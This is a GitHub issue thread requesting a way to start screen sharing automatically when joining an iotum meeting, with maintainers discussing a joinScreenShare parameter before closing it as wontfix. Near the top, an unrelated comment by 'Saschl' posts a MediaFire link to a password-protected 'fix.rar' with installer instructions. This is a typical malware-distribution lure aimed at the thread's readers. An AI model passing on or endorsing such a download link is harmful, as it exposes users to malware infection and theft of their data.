### ISSUE TITLE
Feature request: initiate screenshare view in pre-meeting menu

### ISSUE THREAD

**Issue by alighterink** [iotum/community#6] opened 2024-08-26 16:54 UTC
Can there be a url parameter that can initiate the browsers select screenshare GUI.

or at the very least add a screenshare button int the pre-meeting Audio/Video setup so that a user can join a meeting with screenshare already sharing.

**Comment by Saschl** [comment] 2024-08-26 16:54
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by noamtiotum** [comment] 2024-09-05 13:29
@jenkins-iotum does joinScreenShare=true only initiate screen share on joining or does it also have the user join without audio connected?

**Comment by noamtiotum** [comment] 2024-09-06 18:53
@alighterink can you post what the ideal expected behaviour would be?

**Comment by alighterink** [comment] 2024-09-07 01:49
@noamtiotum I tried with joinScreenShare=true, a couple issues with that. 
1) It does not connect the audio automatically
2) It doesnt appear to work when appended to a room_url that had a 'secure_url' flag. (this is not as big, since we are initiating the conference create so I can use the conf/call/"conference_id")

**Comment by noamtiotum** [comment] 2024-09-09 16:54
@alighterink so the desired functionality is a url param that will connect to the meeting and automatically bring up screen sharing?

**Comment by noamtiotum** [comment] 2024-09-10 20:25
@alighterink I discussed with James and he said he would talk to you about whether you will keep the "screenshare" action on a contact or not.

Once you guys figure it out let us know and we can either support it or we can close this issue.

**Comment by noamtiotum** [comment] 2024-09-20 19:59
I believe this is not needed any longer. The way the current screen sharing parameter works seems to be what is needed.

**Closed by noamtiotum** 2024-09-20 19:59 UTC
Labels: enhancement, wontfix
